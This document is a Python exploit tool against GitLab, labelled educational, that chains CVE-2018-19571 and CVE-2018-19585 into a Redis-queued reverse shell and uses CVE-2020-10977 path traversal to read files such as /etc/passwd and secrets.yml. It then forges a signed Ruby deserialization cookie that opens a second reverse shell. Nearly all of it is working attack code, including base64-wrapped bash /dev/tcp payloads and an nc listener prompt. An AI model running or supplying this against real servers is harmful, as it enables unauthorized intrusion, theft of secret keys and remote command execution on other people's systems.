""" |
Gitlab RCE+LFI version <= 11.4.7, 12.4.0-12.8.1 - EDUCATIONAL USE ONLY |
CVEs: CVE-2018-19571 (SSRF) + CVE-2018-19585 (CRLF) |
CVE-2020-10977 |
""" |
import base64 |
import hashlib |
import hmac |
from html.parser import HTMLParser |
import random |
import string |
import sys |
import time |
import urllib.parse |
import urllib3 |
import requests |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
class GitlabRCE:
    """Shared base class for the modules in this file.

    Owns the HTTP session and the helpers that register, log in and delete a
    throwaway account and that create projects and issues. Subclasses override
    :meth:`main` (and, where needed, :meth:`prepare_payload`).

    Every request is sent with ``verify=False``, i.e. TLS certificates are not
    validated.
    """

    description = "oopsie woopsie we made a fucky wucky a wittle fucko boingo!"

    def __init__(self, gitlab_url, local_ip):
        """Remember the target and local address and open a fresh session.

        :param gitlab_url: base URL of the GitLab instance; paths are appended
            to it verbatim, so it should not end with a slash.
        :param local_ip: local address stored for use by subclasses.
        """
        self.url = gitlab_url
        self.local_ip = local_ip
        self.port = 42069
        # change this if the gitlab has restricted email domains
        self.email_domain = "gmail.htb"
        # Session() is the documented constructor; session() is a legacy alias.
        self.session = requests.Session()
        self.username = ""
        self.password = ""
        # Names of the projects / titles of the issues created by this run.
        self.projects = []
        self.issues = []

    def get_authenticity_token(self, url, i=-1):
        """Fetch *url* and return one of the CSRF tokens found in the page.

        :param url: page to request with the current session.
        :param i: index into the list of tokens found (default: the last one).
        :returns: the token string. If none is found, :meth:`abort` is called.
        """
        result = self.session.get(url, verify=False)
        parser = GitlabParse()
        token = parser.feed(result.text, i)
        if not token:
            print("could not get token!")
            self.abort()
        return token

    def randomize(self):
        """Return a random 10-character string of ASCII letters and digits."""
        sequence = string.ascii_letters + string.digits
        return "".join(random.choices(sequence, k=10))

    def register_user(self):
        """Register an account with random credentials and remember them."""
        authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in")
        self.username = self.randomize()
        self.password = self.randomize()
        email = "{}@{}".format(self.username, self.email_domain)
        data = {
            "new_user[email]": email,
            "new_user[email_confirmation]": email,
            "new_user[username]": self.username,
            "new_user[name]": self.username,
            "new_user[password]": self.password,
            "authenticity_token": authenticity_token,
        }
        result = self.session.post(self.url + "/users", data=data, verify=False)
        print("registering {}:{} - {}".format(self.username, self.password, result.status_code))

    def login_user(self):
        """Sign in with the stored credentials and print the HTTP status."""
        # Index 0 selects the first token on the sign-in page.
        authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in", 0)
        data = {
            "authenticity_token": authenticity_token,
            "user[login]": self.username,
            "user[password]": self.password,
        }
        result = self.session.post(self.url + "/users/sign_in", data=data, verify=False)
        print(result.status_code)

    def delete_user(self):
        """Delete the account created by :meth:`register_user`."""
        authenticity_token = self.get_authenticity_token(self.url + "/profile/account")
        # The form posts to /users with a "_method" field set to "delete".
        data = {
            "authenticity_token": authenticity_token,
            "_method": "delete",
            "password": self.password,
        }
        result = self.session.post(self.url + "/users", data=data, verify=False)
        print("delete user {} - {}".format(self.username, result.status_code))

    def create_empty_project(self):
        """Create a project with a random name and record it in ``projects``."""
        authenticity_token = self.get_authenticity_token(self.url + "/projects/new")
        project = self.randomize()
        self.projects.append(project)
        data = {
            "authenticity_token": authenticity_token,
            "project[ci_cd_only]": "false",
            "project[name]": project,
            "project[path]": project,
            "project[visibility_level]": "0",
            "project[description]": "all your base are belong to us",
        }
        result = self.session.post(self.url + "/projects", data=data, verify=False)
        print("creating project {} - {}".format(project, result.status_code))

    def create_issue(self, project_id, text):
        """Create an issue with a random title in one of the user's projects.

        :param project_id: project path segment (the names stored in
            ``projects`` are used by the callers in this file).
        :param text: issue description.
        """
        issue_link = "{}/{}/{}/issues".format(self.url, self.username, project_id)
        authenticity_token = self.get_authenticity_token(issue_link + "/new")
        issue_title = self.randomize()
        self.issues.append(issue_title)
        data = {
            "authenticity_token": authenticity_token,
            "issue[title]": issue_title,
            "issue[description]": text,
        }
        result = self.session.post(issue_link, data=data, verify=False)
        print("creating issue {} for project {} - {}".format(issue_title, project_id, result.status_code))

    def main(self):
        """Entry point; subclasses are expected to override it."""
        print("main is not implemented")

    def prepare_payload(self):
        """Payload hook; subclasses are expected to override it."""
        print("prepare_payload is not implemented")

    def abort(self):
        """Print a failure notice and terminate the process with status 1.

        :raises SystemExit: always.
        """
        print("Something went wrong! ABORT MISSION!")
        # sys.exit is always available, unlike the exit() helper that the
        # site module injects; a non-zero status reports the failure.
        sys.exit(1)
class GitlabRCE1147(GitlabRCE):
    """Module advertised as "RCE for Version <=11.4.7".

    Flow (see :meth:`main`): register a throwaway user, submit a project
    creation request whose ``project[import_url]`` field carries the string
    built by :meth:`prepare_payload`, wait ten seconds, then delete the user.
    """
    description = "RCE for Version <=11.4.7"

    def exploit_project_creation(self, payload):
        """POST a new-project form whose import URL embeds *payload*.

        :param payload: command string substituted for the ``{payload}``
            placeholder in the template below.
        """
        authenticity_token = self.get_authenticity_token(self.url + "/projects/new")
        project = self.randomize()
        self.projects.append(project)
        # The import "URL" is a git:// address on port 6379 followed by
        # additional lines; the module docstring attributes this to
        # CVE-2018-19571 (SSRF) and CVE-2018-19585 (CRLF).
        payload_template = """git://[0:0:0:0:0:ffff:]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|{payload} \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
exec
exec
exec"""
        # str.format() cannot be used: the template is full of literal JSON
        # braces, so the single placeholder is filled in with str.replace().
        payload = payload_template.replace("{payload}", payload)
        data = {"authenticity_token": authenticity_token, "project[import_url]": payload,
                "project[ci_cd_only]": "false", "project[name]": project,
                "project[path]": project, "project[visibility_level]": "0",
                "project[description]": "all your base are belong to us"}
        result = self.session.post(self.url + "/projects", data=data, verify=False)
        print("hacking in progress - {}".format(result.status_code))

    def prepare_payload(self):
        """Return the command string passed to :meth:`exploit_project_creation`.

        The bash command targeting ``local_ip``:``port`` is base64-encoded and
        wrapped in an ``echo ... | base64 -d | /bin/bash`` pipeline.
        """
        payload = "bash -i >& /dev/tcp/{}/{} 0>&1".format(self.local_ip, self.port)
        wrapper = "echo {base64_payload} | base64 -d | /bin/bash"
        base64_payload = base64.b64encode(payload.encode()).decode("utf-8")
        payload = wrapper.format(base64_payload=base64_payload)
        return payload

    def main(self):
        """Run the module: register, send the request, wait, clean up."""
        self.register_user()
        self.exploit_project_creation(self.prepare_payload())
        # Fixed 10 second pause before the account is removed again.
        time.sleep(10)
        self.delete_user()
class GitlabRCE1281LFI(GitlabRCE):
    """Module advertised as "LFI for version 10.4-12.8.1 and maybe more".

    Flow (see :meth:`main`): register a user, create two projects, create an
    issue in the first one whose description is the string from
    :meth:`lfi_path`, move that issue to the second project and download the
    attachment link found in the moved issue's description.
    """
    description = "LFI for version 10.4-12.8.1 and maybe more"

    def __init__(self, gitlab_url, local_ip, file_to_lfi="/etc/passwd"):
        """Initialise the base class and remember which file to request.

        :param file_to_lfi: absolute path appended to the traversal prefix in
            :meth:`lfi_path`.
        """
        super(GitlabRCE1281LFI, self).__init__(gitlab_url, local_ip)
        self.file_to_lfi = file_to_lfi

    def get_file(self, url, filename):
        """GET *url* and return the response body as text.

        *filename* is only used for the progress message.
        """
        print("Grabbing file {}".format(filename))
        result = self.session.get(url, verify=False)
        return result.text

    def get_technical_id_of_project(self, project_id):
        """Return the numeric id parsed from the project's page.

        :param project_id: project path segment (project name in this file).
        :returns: the integer found by ``ProjectIDParse``, or ``None``.
        """
        url = "{}/{}/{}".format(self.url, self.username, project_id)
        result = self.session.get(url, verify=False)
        parser = ProjectIDParse()
        technical_id = parser.feed(result.text)
        return technical_id

    def extract_link_from_issue_json(self, issue_json, project_id):
        """Build the download URL from the markdown link in an issue description.

        :param issue_json: decoded JSON object with a ``"description"`` key.
        :param project_id: project path segment used to build the URL.
        :returns: ``(url, file_name)`` where *file_name* is the text between
            the first ``[`` and the first ``]`` and the URL path is the text
            between the first ``(`` and the first ``)``.
        """
        field = issue_json["description"]
        # NOTE(review): str.find returns -1 when a bracket is missing; that
        # case is not checked and would yield a meaningless slice.
        file_name = field[field.find("[") + 1:field.find("]")]
        file_path = field[field.find("(") + 1:field.find(")")]
        url = "{}/{}/{}{}".format(self.url, self.username, project_id, file_path)
        return url, file_name

    def lfi_path(self):
        """Return the markdown image link used as the issue description.

        The link target is an ``/uploads/<32 x "1">/`` path followed by a run
        of ``../`` segments and ``file_to_lfi``.
        """
        return "![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})".format(
            self.file_to_lfi)

    def exploit_move_issue(self):
        """Move issue 1 of the first project to the last one and fetch the file.

        :returns: body of the file referenced by the moved issue's description.
        """
        project = self.projects[0]
        other_project = self.projects[-1]
        # The issue number is hard-coded: the first issue of a new project.
        url = "{}/{}/{}/issues/1".format(self.url, self.username, project)
        technical_project_id_other_project = self.get_technical_id_of_project(other_project)
        authenticity_token = self.get_authenticity_token(url)
        issue_json = {"move_to_project_id": technical_project_id_other_project}
        # These headers are set on the session, so they also apply to every
        # later request made through it.
        self.session.headers["X-CSRF-Token"] = authenticity_token
        self.session.headers["Referer"] = url
        result = self.session.post(url + "/move", json=issue_json, verify=False)
        print("moving issue from {} to {} - {}".format(project, other_project, result.status_code))
        url, filename = self.extract_link_from_issue_json(result.json(), other_project)
        file_content = self.get_file(url, filename)
        return file_content

    def main(self):
        """Run the module and print the retrieved file content."""
        self.register_user()
        self.create_empty_project()
        self.create_empty_project()
        self.create_issue(self.projects[0], self.lfi_path())
        file_content = self.exploit_move_issue()
        print(file_content)
        self.delete_user()
class GitlabRCE1281RCE(GitlabRCE1281LFI):
    """Module advertised as "RCE for version 12.4.0-12.8.1" (marked WIP).

    Flow (see :meth:`main`): use the parent's file-read flow to fetch
    ``secrets.yml``, extract ``secret_key_base`` from it, build a signed cookie
    value with that key and send it to the sign-in page.
    """
    description = "RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP"

    def parse_secrets(self, secrets):
        """Return the text between ``secret_key_base: `` and ``otp_key_base``.

        :param secrets: content of the secrets file as text.
        """
        # 17 == len("secret_key_base: "); the trailing 3 characters before
        # "otp_key_base" are cut off as well.
        # NOTE(review): neither str.find result is checked for -1.
        secret_key_base = secrets[secrets.find("secret_key_base: ") + 17:secrets.find("otp_key_base") - 3]
        return secret_key_base

    def get_ruby_shit_byte(self):
        """Return one character chosen from the combined IP and port length.

        The character is inserted directly in front of the embedded source
        text in :meth:`build_payload`.
        """
        # Presumably the Ruby Marshal length prefix of that string - confirm.
        # NOTE(review): the lookup table has 14 entries; an index outside
        # 0..13 raises IndexError and a negative one wraps around.
        length = len(self.local_ip) + len(str(self.port)) - 8
        possible_shit_bytes = "jklmnopqrstuvw"
        return possible_shit_bytes[length]

    def build_payload(self, secret):
        """Return the signed cookie value ``<base64 payload>--<hex digest>``.

        :param secret: key material from :meth:`parse_secrets`.
        """
        payload = "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instanceo:\bERB\b:\t@srcI\"{ruby_shit_byte}exit if fork;c=TCPSocket.new(\"{ip}\",{port});while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\x06:\x06ET:\x0E@filenameI\"\x061\x06;\tT:\f@linenoi\x06:\f@method:\vresult:\t@varI\"\f@result\x06;\tT:\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06;\tT"
        # The literal contains unrelated braces, hence str.replace per placeholder.
        payload = payload.replace("{ip}", self.local_ip).replace("{port}", str(self.port)).replace("{ruby_shit_byte}",
                                                                                                   self.get_ruby_shit_byte())
        # Signing key: PBKDF2-HMAC-SHA1, salt b"signed cookie", 1000 rounds, 64 bytes.
        key = hashlib.pbkdf2_hmac("sha1", password=secret.encode(), salt=b"signed cookie", iterations=1000, dklen=64)
        base64_payload = base64.b64encode(payload.encode())
        # The HMAC-SHA1 digest is computed over the base64 text, not the raw payload.
        digest = hmac.new(key, base64_payload, digestmod=hashlib.sha1).hexdigest()
        return base64_payload.decode() + "--" + digest

    def send_payload(self, payload):
        """GET the sign-in page with *payload* as ``experimentation_subject_id`` cookie."""
        cookie = {"experimentation_subject_id": payload}
        result = self.session.get(self.url + "/users/sign_in", cookies=cookie, verify=False)
        print("deploying payload - {}".format(result.status_code))

    def main(self):
        """Run the module: read the secrets file, build and send the cookie."""
        self.file_to_lfi = "/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml"
        self.register_user()
        self.create_empty_project()
        self.create_empty_project()
        self.create_issue(self.projects[0], self.lfi_path())
        file_contents = self.exploit_move_issue()
        secret = self.parse_secrets(file_contents)
        payload = self.build_payload(secret)
        self.send_payload(payload)
        self.delete_user()
class GitlabRCE1281LFIUser(GitlabRCE1281LFI):
    """Interactive variant that asks for the file path before running."""

    def ask_for_lfi_path(self):
        """Prompt for a path; return the current default on empty input."""
        prompt = "please type in the fully qualified path of the file you want to LFI. Uses {} when left empty: ".format(
            self.file_to_lfi)
        answer = input(prompt).strip()
        # An empty (or whitespace-only) answer keeps the configured default.
        return answer or self.file_to_lfi

    def main(self):
        """Ask for the path, store it, then run the parent flow."""
        self.file_to_lfi = self.ask_for_lfi_path()
        super().main()
class GitlabVersion(GitlabRCE):
    """Reachability check and version lookup for the target instance."""

    def test(self):
        """Abort unless a GET of the base URL answers with status 200 or 302."""
        try:
            result = self.session.get(self.url, verify=False)
        except requests.exceptions.RequestException as error:
            # Connection-level failure: report it and stop.
            print(error)
            self.abort()
            return
        if result.status_code not in (200, 302):
            print("Host {} seems down".format(self.url))
            self.abort()

    def get_version(self):
        """Return the version text parsed from the ``/help`` page, or ``None``."""
        result = self.session.get(self.url + "/help", verify=False)
        print("Getting version of {} - {}".format(self.url, result.status_code))
        return VersionParse().feed(result.text)

    def main(self):
        """Check the host, read the version with a throwaway account, report it.

        The account is deleted before a possible abort so it is not left
        behind when the version cannot be determined.
        """
        self.test()
        self.register_user()
        version = self.get_version()
        # Only announce a version that was actually found (previously this
        # printed "None" before the failure was detected).
        if version:
            print("The Version seems to be {}! Choose wisely".format(version))
        self.delete_user()
        if not version:
            print("Could not get version!")
            self.abort()
class GitlabParse(HTMLParser):
    """Collect CSRF tokens from an HTML page in document order.

    Two sources are recognised:

    * ``<meta name="csrf-token" content="...">``
    * ``<input name="authenticity_token" value="...">``

    Matching is done per tag on the full attribute set, so it does not depend
    on attribute order and no state leaks from one tag into the next.
    """

    # tag -> (required value of the "name" attribute, attribute holding the token)
    _TOKEN_SOURCES = {
        "input": ("authenticity_token", "value"),
        "meta": ("csrf-token", "content"),
    }

    def __init__(self):
        super().__init__()
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        """Record the token carried by *tag*, if it is one of the known sources."""
        source = self._TOKEN_SOURCES.get(tag)
        if source is None:
            return
        expected_name, token_attribute = source
        attributes = dict(attrs)
        token = attributes.get(token_attribute)
        if attributes.get("name") == expected_name and token is not None:
            self.tokens.append(token)

    def feed(self, data, i):
        """Parse *data* and return the token at index *i*.

        :param data: HTML text.
        :param i: list index into the tokens found; negative values count from
            the end.
        :returns: the token string, or ``None`` when the index does not exist.
        """
        super().feed(data)
        try:
            return self.tokens[i]
        except IndexError:
            return None
class ProjectIDParse(HTMLParser):
    """Extract the integer ``value`` of the element with ``id="project_id"``.

    Each tag is inspected on its own, so the result does not depend on
    attribute order and a match cannot spill over into the following tag.
    When several elements match, the last one wins.
    """

    def __init__(self):
        super().__init__()
        # Kept for compatibility: True once a matching element has been seen.
        self.project_found = False
        self.project_id = None

    def feed(self, data):
        """Parse *data* and return the project id, or ``None`` if not found."""
        super().feed(data)
        return self.project_id

    def handle_starttag(self, tag, attrs):
        """Store the numeric value of a tag carrying ``id="project_id"``."""
        attributes = dict(attrs)
        if attributes.get("id") != "project_id":
            return
        try:
            project_id = int(attributes.get("value"))
        except (TypeError, ValueError):
            # Missing or non-numeric value: ignore this element.
            return
        self.project_found = True
        self.project_id = project_id
class VersionParse(HTMLParser):
    """Return the text of the first link whose ``href`` contains ``/tags/v``."""

    def __init__(self):
        super().__init__()
        self.found_version = False
        self.version = None

    def handle_starttag(self, tag, attrs):
        """Flag ``<a>`` tags whose href points at a version tag."""
        if tag == "a":
            # Look at every attribute instead of only the last one, and skip
            # valueless attributes (their value is None).
            self.found_version = any(
                name == "href" and value is not None and "/tags/v" in value
                for name, value in attrs
            )

    def handle_endtag(self, tag):
        """Stop capturing once the link is closed."""
        if tag == "a":
            self.found_version = False

    def handle_data(self, data):
        """Keep the first non-blank text seen inside a flagged link."""
        if self.found_version and not self.version:
            text = data.strip()
            if text:
                self.version = text

    def feed(self, data):
        """Parse *data* and return the version text, or ``None`` if not found."""
        super().feed(data)
        return self.version
class Runner:
    """Interactive command-line front end.

    Constructing an instance immediately parses ``sys.argv`` and, when the
    arguments are valid, runs the whole flow (see :meth:`run`).
    """

    def __init__(self):
        self.available_classes = [GitlabRCE1147, GitlabRCE1281LFIUser, GitlabRCE1281RCE]
        self.local_ip = None
        self.gitlab_url = None
        self.run()

    def banner(self):
        """Print the banner line."""
        print("Gitlab Exploit by dotPY [insert fancy ascii art]")

    def get_version(self):
        """Run the version lookup module against the target."""
        GitlabVersion(self.gitlab_url, self.local_ip).main()

    def list_options_and_choose(self):
        """List the available modules and return the class the user picks."""
        for index, candidate in enumerate(self.available_classes):
            print("[{}] - {} - {}".format(index, candidate.__name__, candidate.description))
        valid_choices = range(len(self.available_classes))
        choice = None
        # Keep asking until a number inside the listed range is entered.
        while choice not in valid_choices:
            try:
                choice = int(input("type a number and hit enter to choose exploit: "))
            except ValueError:
                continue
        return self.available_classes[choice]

    def run_chosen_exploit(self, chosen_exploit):
        """Instantiate the chosen module, wait for confirmation, run it."""
        module = chosen_exploit(self.gitlab_url, self.local_ip)
        input("Start a listener on port {port} and hit enter (nc -vlnp {port})".format(port=module.port))
        module.main()

    def run(self):
        """Read URL and local IP from the command line, then start the flow."""
        argv = sys.argv
        if len(argv) == 3:
            self.gitlab_url, self.local_ip = argv[1], argv[2]
            self.start()
            return
        print("usage: {} <http://gitlab:port> <local-ip>".format(argv[0]))

    def start(self):
        """Banner, version lookup, module selection, module execution."""
        self.banner()
        self.get_version()
        self.run_chosen_exploit(self.list_options_and_choose())
# Only start the interactive flow when executed as a script; constructing
# Runner parses sys.argv and runs everything, which must not happen on import.
if __name__ == "__main__":
    r = Runner()